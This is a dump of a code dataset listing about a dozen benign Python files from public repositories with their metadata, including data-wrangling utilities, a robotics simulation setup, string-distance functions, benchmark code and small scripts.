max_stars_repo_path (string, 3-269 chars) | max_stars_repo_name (string, 4-119 chars) | max_stars_count (int64, 0-191k) | id (string, 1-7 chars) | content (string, 6-1.05M chars) | score (float64, 0.23-5.13) | int_score (int64, 0-5)
---|---|---|---|---|---|---|
dashboard_analytics/tasks/transaction_processor.py | Astewart1510/pvt-algoranddashboard | 0 | 6800 | <filename>dashboard_analytics/tasks/transaction_processor.py
from dashboard_analytics.models import AccountType, InstrumentType, Account, Transaction
def process_json_transactions(transactions):
for txn in transactions:
print(txn["pk"]) | 2.09375 | 2 |
MuonGun/resources/scripts/histreduce.py | hschwane/offline_production | 1 | 6801 | <reponame>hschwane/offline_production<filename>MuonGun/resources/scripts/histreduce.py
#!/usr/bin/env python
"""
Add all (potentially gigantic) histograms in a group of files.
"""
import dashi
import tables
import os, sys, operator, shutil
from optparse import OptionParser
parser = OptionParser(usage="%prog [OPTIONS] infiles outfile", description=__doc__)
parser.add_option("--blocksize", dest="blocksize", type=int, default=2048)
opts, args = parser.parse_args()
if len(args) < 2:
parser.error("You must specify at least one output and one input file")
infiles, outfile = args[:-1], args[-1]
if os.path.exists(outfile):
parser.error("%s already exists!" % outfile)
shutil.copy(infiles[0], outfile)
from collections import defaultdict
paths = defaultdict(list)
for fname in infiles[1:]:
with tables.openFile(fname) as hdf:
for group in hdf.walkNodes(where='/', classname='Group'):
if 'ndim' in group._v_attrs: # a dashi histogram
path = group._v_pathname
paths[path].append(fname)
def histadd(sourceGroup, destGroup, blocksize=1):
"""
Add dashi histograms stored in HDF5 groups
:param blocksize: operate on blocksize I/O chunks at a time
"""
for arr in '_h_bincontent', '_h_squaredweights':
source = sourceGroup._v_children[arr]
dest = destGroup._v_children[arr]
chunksize = blocksize*reduce(operator.mul, dest.chunkshape)
size = reduce(operator.mul, dest.shape)
for i in range(0, size, chunksize):
dest[i:i+chunksize] += source[i:i+chunksize]
for prop in 'nentries', 'nans', 'nans_wgt', 'nans_sqwgt':
destGroup._v_attrs[prop] += sourceGroup._v_attrs[prop]
with tables.openFile(outfile, 'a') as ohdf:
for path, fnames in paths.iteritems():
print(path)
destGroup = ohdf.getNode(path)
for fname in fnames:
with tables.openFile(fname) as hdf:
histadd(hdf.getNode(path), destGroup, opts.blocksize)
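# Illustrative command line for the script above (file names are assumptions, not from the source):
#   python histreduce.py run1.hdf5 run2.hdf5 run3.hdf5 combined.hdf5
# i.e. all but the last argument are input files whose histograms are summed into the output file.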
| 2.359375 | 2 |
procrastinate/exceptions.py | ignaciocabeza/procrastinate | 0 | 6802 | <filename>procrastinate/exceptions.py
import datetime
class ProcrastinateException(Exception):
"""
Unexpected Procrastinate error.
"""
def __init__(self, message=None):
if not message:
message = self.__doc__
super().__init__(message)
class TaskNotFound(ProcrastinateException):
"""
Task cannot be imported.
"""
class JobError(ProcrastinateException):
"""
Job ended with an exception.
"""
class LoadFromPathError(ImportError, ProcrastinateException):
"""
App was not found at the provided path, or the loaded object is not an App.
"""
class JobRetry(ProcrastinateException):
"""
Job should be retried.
"""
def __init__(self, scheduled_at: datetime.datetime):
self.scheduled_at = scheduled_at
super().__init__()
class AppNotOpen(ProcrastinateException):
"""
App was not open. Procrastinate App needs to be opened using:
- ``app.open()``,
- ``await app.open_async()``,
- ``with app.open():``,
- ``async with app.open_async():``.
"""
class ConnectorException(ProcrastinateException):
"""
Database error.
"""
# The precise error can be seen with ``exception.__cause__``.
class AlreadyEnqueued(ProcrastinateException):
"""
There is already a job waiting in the queue with the same queueing lock.
"""
class UniqueViolation(ConnectorException):
"""
A unique constraint is violated. The constraint name is available in
``exception.constraint_name``.
"""
def __init__(self, *args, constraint_name: str):
super().__init__(*args)
self.constraint_name = constraint_name
class MissingApp(ProcrastinateException):
"""
Missing app. This most probably happened because procrastinate needs an
app via --app or the PROCRASTINATE_APP environment variable.
"""
class SyncConnectorConfigurationError(ProcrastinateException):
"""
A synchronous connector (probably Psycopg2Connector) was used, but the operation
needs an asynchronous connector (AiopgConnector). Please check your App
configuration.
"""
| 2.96875 | 3 |
config/settings/local.py | vyshakTs/STORE_MANAGEMENT_SYSTEM | 0 | 6803 | from .base import *
DEBUG = True
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'SMS',
'USER': 'postgres',
'PASSWORD': 'password',
'HOST': 'localhost',
'PORT': '',
}
}
INSTALLED_APPS += [
'debug_toolbar.apps.DebugToolbarConfig',
'django_extensions',
]
ALLOWED_HOSTS += ['.herokuapp.com']
# Loads SECRET_KEY from .env file
# SECRET_KEY = get_env_variable('SECRET_KEY')
| 1.515625 | 2 |
question3.py | haojunsng/foodpanda-dataeng | 0 | 6804 | from functions import get_df, write_df
import geopy
from geopy import distance
"""
The function question3 takes in a dataset name and the latitude and longitude of a potential distress location,
and returns the nearest port with essential provisions such as water, fuel_oil and diesel.
"""
def question3(dataset_name, latitude, longitude):
df = get_df()
distress_location = (latitude, longitude)
    ports_with_provisions = df[(df['provisions'] == True) & (df['water'] == True) & (df['fuel_oil'] == True) & (df['diesel'] == True)].copy()
results = []
for each in ports_with_provisions.itertuples(index=False):
each_coords = (float(each[4]), float(each[5]))
dist = geopy.distance.geodesic(distress_location, each_coords)
results.append(dist.km)
ports_with_provisions['dist'] = results
answer3 = ports_with_provisions.sort_values(by='dist', ascending=True)[['country', 'port_name', 'port_latitude', 'port_longitude']].head(1)
write_df(answer3, dataset_name, 'Table for Question 3')
if __name__ == "__main__":
question3("foodpanda_tables", 32.610982, -38.706256)
| 3.671875 | 4 |
plugins/aea-cli-benchmark/aea_cli_benchmark/case_acn_communication/case.py | valory-xyz/agents-aea | 0 | 6805 | <reponame>valory-xyz/agents-aea<filename>plugins/aea-cli-benchmark/aea_cli_benchmark/case_acn_communication/case.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2022 <NAME>
# Copyright 2018-2021 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""Check amount of time for acn connection communications."""
import asyncio
import logging
import os
import time
from contextlib import contextmanager
from tempfile import TemporaryDirectory
from typing import Callable, List, Tuple, Union
from aea_cli_benchmark.case_acn_communication.utils import (
DEFAULT_DELEGATE_PORT,
DEFAULT_MAILBOX_PORT,
DEFAULT_NODE_PORT,
_make_libp2p_client_connection,
_make_libp2p_connection,
_make_libp2p_mailbox_connection,
)
from aea.connections.base import Connection
from aea.mail.base import Envelope
from packages.fetchai.protocols.default.message import DefaultMessage
class TimeMeasure:
"""Time measure data class."""
def __init__(self):
"""Init data class instance."""
self.time = -1
@contextmanager
def time_measure():
"""Get time measure context."""
start = time.time()
m = TimeMeasure()
try:
yield m
finally:
m.time = time.time() - start
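# Illustrative use of the time_measure() helper above (a sketch; do_work is a placeholder):
#   with time_measure() as tm:
#       do_work()
#   print(tm.time)  # elapsed wall-clock seconds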
def make_envelope(from_addr: str, to_addr: str) -> Envelope:
"""Construct an envelope."""
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
envelope = Envelope(
to=to_addr,
sender=from_addr,
message=msg,
)
return envelope
async def _run(con_maker: Callable[..., Connection]) -> Tuple[float, float]:
"""Run test case and return times for the first and the second messages sent over ACN."""
try:
connections = []
genesis_node = _make_libp2p_connection(".", relay=True)
await genesis_node.connect()
connections.append(genesis_node)
genesis_multiaddr = genesis_node.node.multiaddrs[0]
relay_node1 = _make_libp2p_connection(
".",
relay=True,
entry_peers=[genesis_multiaddr],
port=DEFAULT_NODE_PORT + 1,
mailbox=True,
delegate=True,
mailbox_port=DEFAULT_MAILBOX_PORT + 1,
delegate_port=DEFAULT_DELEGATE_PORT + 1,
)
await relay_node1.connect()
connections.append(relay_node1)
relay_node2 = _make_libp2p_connection(
".",
relay=True,
entry_peers=[genesis_multiaddr],
port=DEFAULT_NODE_PORT + 2,
mailbox=True,
delegate=True,
mailbox_port=DEFAULT_MAILBOX_PORT + 2,
delegate_port=DEFAULT_DELEGATE_PORT + 2,
)
await relay_node2.connect()
connections.append(relay_node2)
relay_node1_multiaddr = relay_node1.node.multiaddrs[0]
relay_node2_multiaddr = relay_node2.node.multiaddrs[0]
await asyncio.sleep(1)
con1 = con_maker(
port=DEFAULT_NODE_PORT + 10,
entry_peer=relay_node1_multiaddr,
mailbox_port=DEFAULT_MAILBOX_PORT + 1,
delegate_port=DEFAULT_DELEGATE_PORT + 1,
pub_key=relay_node1.node.pub,
)
await con1.connect()
connections.append(con1)
con2 = con_maker(
port=DEFAULT_NODE_PORT + 20,
entry_peer=relay_node2_multiaddr,
mailbox_port=DEFAULT_MAILBOX_PORT + 2,
delegate_port=DEFAULT_DELEGATE_PORT + 2,
pub_key=relay_node2.node.pub,
)
await con2.connect()
connections.append(con2)
envelope = make_envelope(con1.address, con2.address)
with time_measure() as tm:
await con1.send(envelope)
envelope = await con2.receive()
first_time = tm.time
with time_measure() as tm:
await con1.send(envelope)
envelope = await con2.receive()
second_time = tm.time
return first_time, second_time
finally:
for con in reversed(connections):
await con.disconnect()
def run(connection: str, run_times: int = 10) -> List[Tuple[str, Union[int, float]]]:
"""Check construction time and memory usage."""
logging.basicConfig(level=logging.CRITICAL)
cwd = os.getcwd()
try:
if connection == "p2pnode":
def con_maker(
port: int,
entry_peer: str,
mailbox_port: int,
delegate_port: int,
pub_key: str,
):
return _make_libp2p_connection(".", port=port, entry_peers=[entry_peer])
elif connection == "client":
def con_maker(
port: int,
entry_peer: str,
mailbox_port: int,
delegate_port: int,
pub_key: str,
):
return _make_libp2p_client_connection(
peer_public_key=pub_key, data_dir=".", node_port=delegate_port
)
elif connection == "mailbox":
def con_maker(
port: int,
entry_peer: str,
mailbox_port: int,
delegate_port: int,
pub_key: str,
):
return _make_libp2p_mailbox_connection(
peer_public_key=pub_key, data_dir=".", node_port=mailbox_port
)
else:
raise ValueError(f"Unsupported connection: {connection}")
with TemporaryDirectory() as tmp_dir:
os.chdir(tmp_dir)
coro = _run(con_maker)
first_time, second_time = asyncio.get_event_loop().run_until_complete(coro)
return [
("first time (seconds)", first_time),
("second time (seconds)", second_time),
]
finally:
os.chdir(cwd)
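# Illustrative invocation of run() above (argument values are assumptions):
#   results = run(connection="client", run_times=10)
#   # -> [("first time (seconds)", ...), ("second time (seconds)", ...)]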
| 1.703125 | 2 |
examples/pybullet/vr_kuka_setup.py | q4a/bullet3 | 12 | 6806 | import pybullet as p
#p.connect(p.UDP,"192.168.86.100")
p.connect(p.SHARED_MEMORY)
p.resetSimulation()
objects = [p.loadURDF("plane.urdf", 0.000000,0.000000,0.000000,0.000000,0.000000,0.000000,1.000000)]
objects = [p.loadURDF("samurai.urdf", 0.000000,0.000000,0.000000,0.000000,0.000000,0.000000,1.000000)]
objects = [p.loadURDF("pr2_gripper.urdf", 0.500000,0.300006,0.700000,-0.000000,-0.000000,-0.000031,1.000000)]
pr2_gripper = objects[0]
print ("pr2_gripper=")
print (pr2_gripper)
jointPositions=[ 0.550569, 0.000000, 0.549657, 0.000000 ]
for jointIndex in range (p.getNumJoints(pr2_gripper)):
p.resetJointState(pr2_gripper,jointIndex,jointPositions[jointIndex])
pr2_cid = p.createConstraint(pr2_gripper,-1,-1,-1,p.JOINT_FIXED,[0,0,0],[0.2,0,0],[0.500000,0.300006,0.700000])
print ("pr2_cid")
print (pr2_cid)
objects = [p.loadURDF("kuka_iiwa/model_vr_limits.urdf", 1.400000,-0.200000,0.600000,0.000000,0.000000,0.000000,1.000000)]
kuka = objects[0]
jointPositions=[ -0.000000, -0.000000, 0.000000, 1.570793, 0.000000, -1.036725, 0.000001 ]
for jointIndex in range (p.getNumJoints(kuka)):
p.resetJointState(kuka,jointIndex,jointPositions[jointIndex])
p.setJointMotorControl2(kuka,jointIndex,p.POSITION_CONTROL,jointPositions[jointIndex],0)
objects = [p.loadURDF("lego/lego.urdf", 1.000000,-0.200000,0.700000,0.000000,0.000000,0.000000,1.000000)]
objects = [p.loadURDF("lego/lego.urdf", 1.000000,-0.200000,0.800000,0.000000,0.000000,0.000000,1.000000)]
objects = [p.loadURDF("lego/lego.urdf", 1.000000,-0.200000,0.900000,0.000000,0.000000,0.000000,1.000000)]
objects = p.loadSDF("gripper/wsg50_one_motor_gripper_new_free_base.sdf")
kuka_gripper = objects[0]
print ("kuka gripper=")
print(kuka_gripper)
p.resetBasePositionAndOrientation(kuka_gripper,[0.923103,-0.200000,1.250036],[-0.000000,0.964531,-0.000002,-0.263970])
jointPositions=[ 0.000000, -0.011130, -0.206421, 0.205143, -0.009999, 0.000000, -0.010055, 0.000000 ]
for jointIndex in range (p.getNumJoints(kuka_gripper)):
p.resetJointState(kuka_gripper,jointIndex,jointPositions[jointIndex])
p.setJointMotorControl2(kuka_gripper,jointIndex,p.POSITION_CONTROL,jointPositions[jointIndex],0)
kuka_cid = p.createConstraint(kuka, 6, kuka_gripper,0,p.JOINT_FIXED, [0,0,0], [0,0,0.05],[0,0,0])
objects = [p.loadURDF("jenga/jenga.urdf", 1.300000,-0.700000,0.750000,0.000000,0.707107,0.000000,0.707107)]
objects = [p.loadURDF("jenga/jenga.urdf", 1.200000,-0.700000,0.750000,0.000000,0.707107,0.000000,0.707107)]
objects = [p.loadURDF("jenga/jenga.urdf", 1.100000,-0.700000,0.750000,0.000000,0.707107,0.000000,0.707107)]
objects = [p.loadURDF("jenga/jenga.urdf", 1.000000,-0.700000,0.750000,0.000000,0.707107,0.000000,0.707107)]
objects = [p.loadURDF("jenga/jenga.urdf", 0.900000,-0.700000,0.750000,0.000000,0.707107,0.000000,0.707107)]
objects = [p.loadURDF("jenga/jenga.urdf", 0.800000,-0.700000,0.750000,0.000000,0.707107,0.000000,0.707107)]
objects = [p.loadURDF("table/table.urdf", 1.000000,-0.200000,0.000000,0.000000,0.000000,0.707107,0.707107)]
objects = [p.loadURDF("teddy_vhacd.urdf", 1.050000,-0.500000,0.700000,0.000000,0.000000,0.707107,0.707107)]
objects = [p.loadURDF("cube_small.urdf", 0.950000,-0.100000,0.700000,0.000000,0.000000,0.707107,0.707107)]
objects = [p.loadURDF("sphere_small.urdf", 0.850000,-0.400000,0.700000,0.000000,0.000000,0.707107,0.707107)]
objects = [p.loadURDF("duck_vhacd.urdf", 0.850000,-0.400000,0.900000,0.000000,0.000000,0.707107,0.707107)]
objects = p.loadSDF("kiva_shelf/model.sdf")
ob = objects[0]
p.resetBasePositionAndOrientation(ob,[0.000000,1.000000,1.204500],[0.000000,0.000000,0.000000,1.000000])
objects = [p.loadURDF("teddy_vhacd.urdf", -0.100000,0.600000,0.850000,0.000000,0.000000,0.000000,1.000000)]
objects = [p.loadURDF("sphere_small.urdf", -0.100000,0.955006,1.169706,0.633232,-0.000000,-0.000000,0.773962)]
objects = [p.loadURDF("cube_small.urdf", 0.300000,0.600000,0.850000,0.000000,0.000000,0.000000,1.000000)]
objects = [p.loadURDF("table_square/table_square.urdf", -1.000000,0.000000,0.000000,0.000000,0.000000,0.000000,1.000000)]
ob = objects[0]
jointPositions=[ 0.000000 ]
for jointIndex in range (p.getNumJoints(ob)):
p.resetJointState(ob,jointIndex,jointPositions[jointIndex])
objects = [p.loadURDF("husky/husky.urdf", 2.000000,-5.000000,1.000000,0.000000,0.000000,0.000000,1.000000)]
ob = objects[0]
jointPositions=[ 0.000000, 0.000000, 0.000000, 0.000000, 0.000000, 0.000000, 0.000000, 0.000000, 0.000000, 0.000000 ]
for jointIndex in range (p.getNumJoints(ob)):
p.resetJointState(ob,jointIndex,jointPositions[jointIndex])
p.setGravity(0.000000,0.000000,0.000000)
p.setGravity(0,0,-10)
p.stepSimulation()
p.disconnect()
| 2.21875 | 2 |
genomics_algo/utilities/string_cmp.py | SvoONs/genomics_algo | 0 | 6807 | <filename>genomics_algo/utilities/string_cmp.py<gh_stars>0
def longest_common_prefix(s1: str, s2: str) -> str:
"""
Finds the longest common prefix (substring) given two strings
s1: First string to compare
s2: Second string to compare
Returns:
Longest common prefix between s1 and s2
>>> longest_common_prefix("ACTA", "GCCT")
''
>>> longest_common_prefix("ACTA", "ACT")
'ACT'
>>> longest_common_prefix("ACT", "ACTA")
'ACT'
>>> longest_common_prefix("GATA", "GAAT")
'GA'
>>> longest_common_prefix("ATGA", "")
''
>>> longest_common_prefix("", "GCCT")
''
>>> longest_common_prefix("GCCT", "GCCT")
'GCCT'
"""
i = 0
while i < min(len(s1), len(s2)):
if s1[i] != s2[i]:
break
i += 1
return s1[:i]
def longest_common_suffix(s1: str, s2: str) -> str:
"""
Finds the longest common suffix (substring) given two strings
s1: First string to compare
s2: Second string to compare
Returns:
Longest common suffix between s1 and s2
>>> longest_common_suffix("ACTA", "GCCT")
''
>>> longest_common_suffix("ACTA", "CTA")
'CTA'
>>> longest_common_suffix("CTA", "ACTA")
'CTA'
>>> longest_common_suffix("GATAT", "GAATAT")
'ATAT'
>>> longest_common_suffix("ACTA", "")
''
>>> longest_common_suffix("", "GCCT")
''
>>> longest_common_suffix("GCCT", "GCCT")
'GCCT'
"""
return longest_common_prefix(s1[::-1], s2[::-1])[::-1]
def find_hamming_distance(s1: str, s2: str) -> int:
"""Compute the Hamming distance between two strings of equal length
>>> find_hamming_distance("ATG", "ATC")
1
>>> find_hamming_distance("ATG", "TGA")
3
>>> find_hamming_distance("A", "A")
0
>>> find_hamming_distance("ATG", "ATG")
0
>>> find_hamming_distance("", "")
0
>>> find_hamming_distance("GAGGTAGCGGCGTTTAAC", "GTGGTAACGGGGTTTAAC")
3
"""
assert len(s1) == len(s2)
return sum(1 for i in range(len(s1)) if s1[i] != s2[i])
def find_levenshtein_distance(s1: str, s2: str) -> int:
"""Compute the Levenshtein distance between two strings (i.e., minimum number
of edits including substitution, insertion and deletion needed in a string to
turn it into another)
>>> find_levenshtein_distance("AT", "")
2
>>> find_levenshtein_distance("AT", "ATC")
1
>>> find_levenshtein_distance("ATG", "ATC")
1
>>> find_levenshtein_distance("ATG", "TGA")
2
>>> find_levenshtein_distance("ATG", "ATG")
0
>>> find_levenshtein_distance("", "")
0
>>> find_levenshtein_distance("GAGGTAGCGGCGTTTAAC", "GTGGTAACGGGGTTTAAC")
3
>>> find_levenshtein_distance("TGGCCGCGCAAAAACAGC", "TGACCGCGCAAAACAGC")
2
>>> find_levenshtein_distance("GCGTATGCGGCTAACGC", "GCTATGCGGCTATACGC")
2
"""
# initializing a matrix for with `len(s1) + 1` rows and `len(s2) + 1` columns
D = [[0 for x in range(len(s2) + 1)] for y in range(len(s1) + 1)]
# fill first column
for i in range(len(s1) + 1):
D[i][0] = i
# fill first row
for j in range(len(s2) + 1):
D[0][j] = j
# fill rest of the matrix
for i in range(1, len(s1) + 1):
for j in range(1, len(s2) + 1):
distance_left = D[i][j - 1] + 1 # deletion in pattern
distance_above = D[i - 1][j] + 1 # insertion in pattern
distance_diagonal = D[i - 1][j - 1] + (
s1[i - 1] != s2[j - 1]
) # substitution
D[i][j] = min(distance_left, distance_above, distance_diagonal)
# return the last value (i.e., right most bottom value)
return D[-1][-1]
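# Worked illustration (not part of the original module): for s1 = "AT" and s2 = "ATC" the filled
# matrix D is
#   [[0, 1, 2, 3],
#    [1, 0, 1, 2],
#    [2, 1, 0, 1]]
# so D[-1][-1] == 1, matching the doctest find_levenshtein_distance("AT", "ATC") above.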
| 3.5 | 4 |
whyqd/parsers/wrangling_parser.py | whythawk/whyqd | 17 | 6808 | from __future__ import annotations
from typing import Optional, Dict, List, Union, Type, TYPE_CHECKING
from datetime import date, datetime
import pandas as pd
import numpy as np
import re
import locale
try:
locale.setlocale(locale.LC_ALL, "en_US.UTF-8")
except locale.Error:
# Readthedocs has a problem, but difficult to replicate
locale.setlocale(locale.LC_ALL, "")
from . import CoreScript
from ..models import ColumnModel
from ..types import MimeType
if TYPE_CHECKING:
from ..schema import Schema
from ..models import DataSourceModel
class WranglingScript:
"""Get, review and restructure tabular data."""
def __init__(self):
self.check_source = CoreScript().check_source
self.core = CoreScript()
self.DATE_FORMATS = {
"date": {"fmt": ["%Y-%m-%d"], "txt": ["YYYY-MM-DD"]},
"datetime": {
"fmt": ["%Y-%m-%d %H:%M:%S", "%Y-%m-%d %H:%M:%S %Z%z"],
"txt": ["YYYY-MM-DD hh:mm:ss", "YYYY-MM-DD hh:mm:ss UTC+0000"],
},
"year": {"fmt": ["%Y"], "txt": ["YYYY"]},
}
def get_dataframe(
self,
source: str,
preserve: Union[str, List[str]] = None,
filetype: MimeType = MimeType.CSV,
names: Optional[List[str]] = None,
nrows: Optional[int] = None,
) -> Union[Dict[str, pd.DataFrame], pd.DataFrame]:
"""Return a Pandas dataframe from a given source.
        Accepts default pandas parameters for Excel and CSV, but the objective is to preserve the source data with
        as little data conversion as possible outside of the data wrangling process.
Parameters
----------
source: str
Source filename.
preserve: str or list of str, default None
Column names where variable type guessing must be prevented and the original data preserved.
Critical for foreign key references with weird formats, like integers with leading `0`.
filetype: MimeType, default MimeType.CSV
Pandas can read a diversity of filetypes, but whyqd has only been tested on `xls`, `xlsx` and `csv`.
names: list of str, default None
If the source data has no header row, explicitly pass a list of names - in the correct order - to address
the data.
nrows: int, default None
A specified number of rows to return. For review, it is faster to load only a small number.
Returns
-------
DataFrame or dict of DataFrame
"""
self.check_source(source)
# If the dtypes have not been set, then ensure that any provided preserved columns remain untouched
# i.e. no forcing of text to numbers
# defaulting to `dtype = object` ...
kwargs = {}
if preserve:
if not isinstance(preserve, list):
preserve = [preserve]
# kwargs["dtype"] = {k: object for k in preserve}
kwargs["dtype"] = {k: pd.StringDtype() for k in preserve}
if names:
kwargs["header"] = None
kwargs["names"] = names
if nrows:
kwargs["nrows"] = nrows
# Check filetype
if filetype in [MimeType.XLS, MimeType.XLSX]:
# This will default to returning a dictionary of dataframes for each sheet
kwargs["sheet_name"] = None
df = pd.read_excel(source, **kwargs)
keys = list(df.keys())
for k in keys:
if df[k].empty:
del df[k]
if len(df.keys()) == 1:
df = df[keys[0]]
if filetype == MimeType.CSV:
# New in pandas 1.3: will ignore encoding errors - perfect for this initial wrangling process
kwargs["encoding_errors"] = "ignore"
            # Supposed to help with fruity separator guessing
kwargs["engine"] = "python"
if not nrows:
df = pd.read_csv(source, **kwargs)
else:
kwargs["iterator"] = True
kwargs["chunksize"] = 10000
df_iterator = pd.read_csv(source, **kwargs)
df = pd.concat(df_iterator, ignore_index=True)
return df
def get_dataframe_from_datasource(self, data: DataSourceModel) -> pd.DataFrame:
"""Return the dataframe for a data source.
Parameters
----------
data: DataSourceModel
Returns
-------
pd.DataFrame
"""
path = data.path
try:
self.core.check_source(path)
except FileNotFoundError:
path = str(self.directory / data.source)
self.core.check_source(path)
df_columns = [d.name for d in data.columns]
names = [d.name for d in data.names] if data.names else None
df = self.get_dataframe(
source=path,
filetype=data.mime,
names=names,
preserve=[d.name for d in data.preserve if d.name in df_columns],
)
if isinstance(df, dict):
if df:
df = df[data.sheet_name]
else:
# It's an empty df for some reason. Maybe excessive filtering.
df = pd.DataFrame()
if df.empty:
raise ValueError(
f"Data source contains no data ({data.path}). Review actions to see if any were more destructive than expected."
)
return df
    def get_dataframe_columns(self, df: pd.DataFrame) -> List[ColumnModel]:
"""Returns a list of ColumnModels from a source DataFrame.
Parameters
----------
df: pd.DataFrame
Should be derived from `get_dataframe` with a sensible default for `nrows` being 50.
Returns
-------
List of ColumnModel
"""
# Prepare summary
columns = [
{"name": k, "type": "number"}
if v in ["float64", "int64"]
else {"name": k, "type": "date"}
if v in ["datetime64[ns]"]
else {"name": k, "type": "string"}
for k, v in df.dtypes.apply(lambda x: x.name).to_dict().items()
]
return [ColumnModel(**c) for c in columns]
def deduplicate_columns(self, df: pd.DataFrame, schema: Type[Schema]) -> pd.Index:
"""
Source: https://stackoverflow.com/a/65254771/295606
Source: https://stackoverflow.com/a/55405151
Returns a new column list permitting deduplication of dataframes which may result from merge.
Parameters
----------
df: pd.DataFrame
fields: list of FieldModel
Destination Schema fields
Returns
-------
pd.Index
Updated column names
"""
column_index = pd.Series(df.columns.tolist())
if df.columns.has_duplicates:
duplicates = column_index[column_index.duplicated()].unique()
for name in duplicates:
dups = column_index == name
replacements = [f"{name}{i}" if i != 0 else name for i in range(dups.sum())]
column_index.loc[dups] = replacements
# Fix any fields with the same name as any of the target fields
# Do this to 'force' schema assignment
for name in [f.name for f in schema.get.fields]:
dups = column_index == name
replacements = [f"{name}{i}__dd" if i != 0 else f"{name}__dd" for i in range(dups.sum())]
column_index.loc[dups] = replacements
return pd.Index(column_index)
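# Worked illustration of deduplicate_columns (assumed example, not from the source): for a merged
# frame with columns ["a", "b", "b"] and a schema defining a field named "a", the duplicated "b"
# becomes "b1" and the schema clash "a" becomes "a__dd", giving the index ["a__dd", "b", "b1"].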
# def check_column_unique(self, source: str, key: str) -> bool:
# """
# Test a column in a dataframe to ensure all values are unique.
# Parameters
# ----------
# source: Source filename
# key: Column name of field where data are to be tested for uniqueness
# Raises
# ------
# ValueError if not unique
# Returns
# -------
# bool, True if unique
# """
# df = self.get_dataframe(source, key)
# if len(df[key]) != len(df[key].unique()):
# import warnings
# filename = source.split("/")[-1] # Obfuscate the path
# e = "'{}' contains non-unique rows in column `{}`".format(filename, key)
# # raise ValueError(e)
# warnings.warn(e)
# return True
# def check_date_format(self, date_type: str, date_value: str) -> bool:
# # https://stackoverflow.com/a/37045601
# # https://www.saltycrane.com/blog/2009/05/converting-time-zones-datetime-objects-python/
# for fmt in self.DATE_FORMATS[date_type]["fmt"]:
# try:
# if date_value == datetime.strptime(date_value, fmt).strftime(fmt):
# return True
# except ValueError:
# continue
# raise ValueError(f"Incorrect date format, should be: `{self.DATE_FORMATS[date_type]['txt']}`")
###################################################################################################
### Pandas type parsers
###################################################################################################
def parse_dates(self, x: Union[None, str]) -> Union[pd.NaT, date.isoformat]:
"""
This is the hard-won 'trust nobody', certainly not Americans, date parser.
TODO: Replace with https://github.com/scrapinghub/dateparser
The only concern is that dateparser.parse(x).date().isoformat() will coerce *any* string to a date,
no matter *what* it is.
"""
if pd.isnull(x):
return pd.NaT
# Check if to_datetime can handle things
if not pd.isnull(pd.to_datetime(x, errors="coerce", dayfirst=True)):
return date.isoformat(pd.to_datetime(x, errors="coerce", dayfirst=True))
# Manually see if coersion will work
x = str(x).strip()[:10]
x = re.sub(r"[\\/,\.]", "-", x)
try:
y, m, d = x.split("-")
except ValueError:
return pd.NaT
if len(y) < 4:
# Swap the day and year positions
# Ignore US dates
d, m, y = x.split("-")
# Fat finger on 1999 ... not going to check for other date errors as no way to figure out
if y[0] == "9":
y = "1" + y[1:]
x = "{}-{}-{}".format(y, m, d)
try:
x = datetime.strptime(x, "%Y-%m-%d")
except ValueError:
return pd.NaT
x = date.isoformat(x)
try:
pd.Timestamp(x)
return x
except pd.errors.OutOfBoundsDatetime:
return pd.NaT
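# Illustrative behaviour of parse_dates above (assumed examples, not from the source):
#   parse_dates("25/12/2020")  -> "2020-12-25"  (day-first strings are honoured)
#   parse_dates("not a date")  -> pd.NaT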
def parse_float(self, x: Union[str, int, float]) -> Union[np.nan, float]:
"""
Regex to extract wrecked floats: https://stackoverflow.com/a/385597
Checked against: https://regex101.com/
"""
try:
return float(x)
except ValueError:
re_float = re.compile(
r"""(?x)
^
\D* # first, match an optional sign *and space*
( # then match integers or f.p. mantissas:
\d+ # start out with a ...
(
\.\d* # mantissa of the form a.b or a.
)? # ? takes care of integers of the form a
|\.\d+ # mantissa of the form .b
)
([eE][+-]?\d+)? # finally, optionally match an exponent
$"""
)
try:
x = re_float.match(x).group(1)
x = re.sub(r"[^e0-9,-\.]", "", str(x))
return locale.atof(x)
except (ValueError, AttributeError):
return np.nan
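# Illustrative use of WranglingScript (a sketch; "survey.csv" and "ward_code" are hypothetical):
#   wrangle = WranglingScript()
#   df = wrangle.get_dataframe("survey.csv", preserve="ward_code", filetype=MimeType.CSV, nrows=50)
#   columns = wrangle.get_dataframe_columns(df)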
| 2.28125 | 2 |
0x02-python-import_modules/2-args.py | FatChicken277/holbertonschool-higher_level_programming | 0 | 6809 | #!/usr/bin/python3
def args(args):
lenn = len(args) - 1
if lenn == 0:
print("0 arguments.")
elif lenn == 1:
print("{0} argument:".format(lenn))
print("{0}: {1}".format(lenn, args[lenn]))
elif lenn > 1:
print("{0} arguments:".format(lenn))
for i in range(lenn):
print("{0}: {1}".format(i+1, args[i+1]))
if __name__ == "__main__":
import sys
args(sys.argv)
| 3.859375 | 4 |
taurex/data/profiles/__init__.py | rychallener/TauREx3_public | 10 | 6810 | """
These modules contain sub-modules related to defining various profiles in a model
""" | 1.132813 | 1 |
day-2/part_b.py | yuetsin/AoC | 0 | 6811 | <gh_stars>0
#!/usr/bin/env python3
import re
def get_input() -> list:
with open('./input', 'r') as f:
return [v for v in [v.strip() for v in f.readlines()] if v]
lines = get_input()
count = 0
for line in lines:
lower, upper, char, password = re.split(r'-|: | ', line)
lower, upper = int(lower) - 1, int(upper) - 1
try:
if (password[lower] == char) ^ (password[upper] == char):
count += 1
    except IndexError:
# don't care about boundaries
pass
print(count)
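# Worked example of the parsing above (illustrative): for the line "1-3 a: abcde",
# re.split(r'-|: | ', line) yields ['1', '3', 'a', 'abcde'], so lower = 0, upper = 2, and
# password[0] == 'a' while password[2] != 'a' -- exactly one position matches, so the line counts.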
| 3.5 | 4 |
